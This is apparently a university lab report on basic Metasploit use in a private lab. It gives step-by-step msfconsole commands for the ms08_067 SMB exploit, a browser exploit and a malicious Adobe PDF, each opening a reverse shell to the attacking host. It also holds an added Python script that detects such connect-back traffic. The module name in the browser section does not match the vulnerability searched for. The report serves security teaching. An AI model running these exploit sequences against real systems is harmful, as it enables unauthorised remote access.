2017-2018-2 20155231 "Network Countermeasure Technology" Experiment 5: MSF Basic Application
Experimental content
An active attack practice such as ms08_067
Start the MSF console:
msfconsole
Then use the search command to find the module for this vulnerability:
search ms08_067
The path name of the penetration attack module is "exploit/windows/smb/ms08_067_netapi" and consists of four parts: module type, target platform, target service and module name.
use exploit/windows/smb/ms08_067_netapi
View the available payloads:
show payloads
Select attack payload:
set payload generic/shell_reverse_tcp
View the configuration items required to configure penetration attacks:
show options
View the target platforms that this exploit module can successfully attack:
show targets
- Set the target IP (the default port is 445)
set RHOST 192.168.241.138
- After success, connect back to the attacking host on port 5231
set LPORT 5231
set LHOST 192.168.241.134
The target type here is 5 (this system has no Data Execution Prevention (DEP)):
set target 5
Check that the option values are set correctly:
show options
Launch the exploit:
exploit
- View the result:
ipconfig /all
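From the defender's side, the ms08_067 run above leaves a characteristic traffic pattern: an inbound connection to the victim's TCP/445, followed shortly by a new outbound connection from the victim back to the same peer on an unusual port (the LPORT, 5231 here). The following script is an added example, not part of the lab report; it runs that check over constructed connection-log lines (the log format, host addresses and allowlisted ports are assumptions chosen for the example), and it generalises to any inbound service port rather than only 445.

```python
# Added example (not from the lab report): flag a connect-back that follows an
# inbound service connection, the traffic pattern of the ms08_067 exploit
# above: attacker -> victim:445, then victim -> attacker:LPORT shortly after.
# Log format is constructed for this example: <epoch>,<src>,<sport>,<dst>,<dport>
from collections import defaultdict

# Constructed sample: .134 (attacker) hits SMB on .138; .138 calls back on 5231
# 12 s later. The .150 exchange is a benign HTTPS reply, not a connect-back.
SAMPLE_LOG = """\
1525000000,192.168.241.134,49152,192.168.241.138,445
1525000003,192.168.241.138,49700,192.168.241.1,53
1525000012,192.168.241.138,49701,192.168.241.134,5231
1525000030,192.168.241.150,49160,192.168.241.138,445
1525000900,192.168.241.138,49702,192.168.241.150,443
"""

MONITORED_HOST = "192.168.241.138"
WINDOW_SECONDS = 120
EXPECTED_OUTBOUND_PORTS = {53, 80, 443}   # assumed normal workstation egress


def parse_log(text):
    """Yield (ts, src_ip, src_port, dst_ip, dst_port) per non-empty line."""
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            ts, src, sport, dst, dport = line.split(",")
            yield int(ts), src, int(sport), dst, int(dport)


def detect_connect_back(text, host=MONITORED_HOST, window=WINDOW_SECONDS):
    """Return one alert per outbound connection from `host` to a peer that
    connected inbound within `window` seconds, on a non-allowlisted port."""
    inbound = defaultdict(list)   # peer_ip -> [(ts, service_port), ...]
    alerts = []
    for ts, src, sport, dst, dport in parse_log(text):
        if dst == host:           # inbound: remember peer and service port
            inbound[src].append((ts, dport))
        elif src == host and dport not in EXPECTED_OUTBOUND_PORTS:
            for in_ts, svc in inbound.get(dst, []):
                if 0 <= ts - in_ts <= window:
                    alerts.append({"peer": dst, "service_port": svc,
                                   "callback_port": dport, "delay": ts - in_ts})
                    break
    return alerts
```

On the sample log, detect_connect_back(SAMPLE_LOG) returns a single alert for the 445 -> 5231 pair; the same check on real netflow or host firewall logs is a cheap way to catch reverse shells regardless of which exploit produced them.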
A browser-targeted attack such as ms11_050
Here I used an IE browser vulnerability found on the Internet: ms14_064 (we are different).
First enter
search ms14_064
to find the vulnerability's module.
- Attack the browser, enter
use exploit/windows/browser/ms10_046_shortcut_icon_
- Enter
show payloads
to view the available payloads; the payload used in this experiment is
set payload generic/shell_reverse_tcp
Enter
show options
to see what needs to be configured, then enter
set SRVHOST 192.168.241.134
set LHOST 192.168.241.134
set LPORT 5231
Enter
exploit
to generate the URL.
- Access the URL on the Windows side
- On the Kali side, enter
sessions
to see a connection with ID 1. Then enter
sessions -i 1
to attach to the session with ID 1, enter the shell, and the attack succeeds.
A client-side attack such as Adobe
First, search with
search adobe
then select the module:
use windows/fileformat/adobe_flashplayer_button
Then set the payload:
set payload windows/meterpreter/reverse_tcp
and use
show options
to view the information that needs to be configured.
- LHOST, LPORT and FILENAME need to be configured.
Enter
exploit
to generate the PDF file. Then enter
use exploit/multi/handler
, set the listening port and host, and enter
exploit
to start listening. On the Windows side, open 20155231.pdf and the connection back succeeds.
(We are different... I tried many templates but only succeeded once, and have no screenshots yet. Most attempts look like this: the connection does not succeed and the port is not opened.)
Successfully applied any of the auxiliary modules
Use show auxiliary to view auxiliary modules (we are different)
- Select scanner/http/title to scan web page titles
View the configuration and set LHOST to
192.168.241.134
then enter
exploit
to run it.
The output is as shown. But I don't know where the title is recorded, or what the use of this vulnerability is.
Answer questions after the test
- Explain in your own words what exploit, payload and encode are.
- An exploit is an execution vulnerability.
- A payload is the load that is carried, a carrier template for the code that gets executed.
- Encode is encoding, which disguises our program or code.
Practice summary and experience
Because my computer's configuration is a bit weak, opening the two virtual machines together made it freeze, so I used a classmate's computer to do the experiment. Those who succeed are all alike; those who fail each fail in their own way. I looked at the problems and solutions other students encountered in the experiment. Some were resolved, some are still not resolved...
What technologies or steps are still missing for real-world use?
Many files generated by these exploits will be detected and killed by the antivirus "housekeeper". Achieving the connection back is a problem in practice, and so is getting the target to perform the required action.